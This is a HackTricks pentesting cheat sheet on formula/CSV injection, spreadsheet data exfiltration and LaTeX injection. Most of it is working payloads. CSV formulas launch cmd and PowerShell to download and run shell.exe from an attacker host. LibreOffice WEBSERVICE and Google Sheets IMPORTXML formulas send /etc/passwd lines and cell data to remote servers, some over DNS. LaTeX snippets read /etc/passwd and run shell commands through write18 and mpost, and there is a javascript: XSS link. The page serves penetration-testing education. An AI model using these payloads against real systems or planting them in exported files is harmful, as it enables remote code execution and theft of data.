hacktricks/pentesting-web/formula-doc-latex-injection.md
2022-11-13 10:12:25 +00:00

252 lines
11 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Formula/CSV/Doc/LaTeX Injection
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>
## Formula Injection
### Info
If your **input** is being **reflected** inside **CSV file**s (or any other file that is probably going to be opened by **Excel**), you maybe able to put Excel **formulas** that will be **executed** when the user **opens the file** or when the user **clicks on some link** inside the excel sheet.
{% hint style="danger" %}
Nowadays **Excel will alert** (several times) the **user when something is loaded from outside the Excel** in order to prevent him to from malicious action. Therefore, special effort on Social Engineering must be applied to he final payload.
{% endhint %}
### [Wordlist](https://github.com/payloadbox/csv-injection-payloads)
```
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
```
### Hyperlink
**The following example is very useful to exfiltrate content from the final excel sheet and to perform requests to arbitrary locations. But it requires the use to click on the link (and accept the warning prompts).**
Example taken from [https://payatu.com/csv-injection-basic-to-exploit](https://payatu.com/csv-injection-basic-to-exploit)
Let us assume an attack scenario of Student Record Management system of a school. The application allows teacher to enter details of students in the school. The attacker get access to the application and want that all the teacher using the application to get compromised. So the attacker tries to perform CSV injection attack through the web application.\
The attacker need to steal other students details. So the attacker uses the Hyperlink formula ad enter it while entering student details.
![](https://payatu.com/wp-content/uploads/2017/11/Selection\_008.png)
When the teacher export the CSV and click on the hyperlink then the sensitive data is sent to the attackers server.
![](https://payatu.com/wp-content/uploads/2017/11/Selection\_009.png)
CSV file exported contains malicious payload in it.
![](https://payatu.com/wp-content/uploads/2017/11/Selection\_010.png)
The details of student in logged in the attackers web server.
![](https://payatu.com/wp-content/uploads/2017/11/Selection\_011.png)
### RCE
For this example to work it's **needed to have enable the following configuration**:\
File → Options → Trust Center → Trust Center Settings → External Content → Enable Dynamic Data Exchange Server Launch\
or the use of an **old Excel version**.
The good news is that **this payload is executed automatically when the file is opened** (f the user accepts the warnings).
It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1) (1) (1) (2).png>)
### More
```bash
=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
```
### LFI
**LibreOffice Calc**
* This will read the 1st line from the local /etc/passwd file: `='file:///etc/passwd'#$passwd.A1`
* Ex-filtrate it: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)))`
* Ex-filtrate more than one line: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
* DNS Exfiltration: `=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),"."))`
**Analyzing the DNS ex-filtration payload:**
* file:///etc/passwd#$passwd.A19 Will read the 19th line from the local /etc/passwd file
* ENCODEURL(file:///etc/passwd#$passwd.A19) URL encode the returned data
* MID((ENCODEURL(file:///etc/passwd#$passwd.A19)),1,41) Similar to substring, read data from 1st character to 41st a very handy way to restrict the length of DNS hostnames (254 character limit on FQDN and 63 characters for a label, i.e. subdomain)
* SUBSTITUTE(MID((ENCODEURL(file:///etc/passwd#$passwd.A19)),1,41),”%”,”-“) replace all instances of % (the special character from URL encoding) with dash this is ensure that only valid DNS characters are used
* CONCATENATE((SUBSTITUTE(MID((ENCODEURL(file:///etc/passwd#$passwd.A19)),1,41),”%”,”-“)),”.\<FQDN>”) Concatenate the output from the file (after the above processing has taken place) with the FQDN (for which we have access to the host that is authoritative for the domain)
* WEBSERVICE Will make a request for this non-existent DNS name which we can then parse the logs (or run tcpdump etc.) on the DNS authoritative name server for which we have control
### Google Sheets OOB Data Exfiltration
Firstly, lets introduce some of the more interesting functions.
**CONCATENATE**: Appends strings to one another.
```
=CONCATENATE(A2:E2)
```
**IMPORTXML**: Imports data from various structured data types including XML, HTML, CSV, TSV, and RSS and ATOM XML feeds.
```
=IMPORTXML(CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")
```
**IMPORTFEED**: Imports a RSS or ATOM feed.
```
=IMPORTFEED(CONCAT("http://[remote IP:Port]//123.txt?v=", CONCATENATE(A2:E2)))
```
**IMPORTHTML**: Imports data from a table or list within an HTML page.
```
=IMPORTHTML (CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)),"table",1)
```
**IMPORTRANGE**: Imports a range of cells from a specified spreadsheet.
```
=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")
```
**IMAGE**: Inserts an image into a cell.
```
=IMAGE("https://[remote IP:Port]/images/srpr/logo3w.png")
```
## LaTeX Injection
Usually the servers that will find on the internet that **convert LaTeX code to PDF** use **`pdflatex`**.\
This program uses 3 main attributes to (dis)allow command execution:
* **`--no-shell-escape`**: **Disable** the `\write18{command}` construct, even if it is enabled in the texmf.cnf file.
* **`--shell-restricted`**: Same as `--shell-escape`, but **limited** to a 'safe' set of **predefined** \*\*commands (\*\*On Ubuntu 16.04 the list is in `/usr/share/texmf/web2c/texmf.cnf`).
* **`--shell-escape`**: **Enable** the `\write18{command}` construct. The command can be any shell command. This construct is normally disallowed for security reasons.
However, there are other ways to execute commands, so to avoid RCE it's very important to use `--shell-restricted`.
### Read file <a href="#read-file" id="read-file"></a>
```bash
\input{/etc/passwd}
\include{password} # load .tex file
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
```
#### Read single lined file
```bash
ewread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file
```
#### Read multiple lined file
```bash
ewread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
```
### Write file <a href="#write-file" id="write-file"></a>
```bash
ewwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile
```
### Command execution <a href="#command-execution" id="command-execution"></a>
The input of the command will be redirected to stdin, use a temp file to get it.
```bash
\immediate\write18{env > output}
\input{output}
\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}
# allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}
# If mpost is not allowed there are other commands you might be able to execute
## Just get the version
\input{|"bibtex8 --version > /tmp/b.tex"}
## Search the file pdfetex.ini
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
## Get env var value
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}
```
If you get any LaTex error, consider using base64 to get the result without bad characters
```bash
\immediate\write18{env | base64 > test.tex}
\input{text.tex}
```
```bash
\input|ls|base4
\input{|"/bin/hostname"}
```
### Cross Site Scripting <a href="#cross-site-scripting" id="cross-site-scripting"></a>
From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
```bash
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
```
## References
* [https://notsosecure.com/data-exfiltration-formula-injection-part1](https://notsosecure.com/data-exfiltration-formula-injection-part1)
* [https://0day.work/hacking-with-latex/](https://0day.work/hacking-with-latex/)
* [https://salmonsec.com/cheatsheet/latex\_injection](https://salmonsec.com/cheatsheet/latex\_injection)
* [https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/](https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>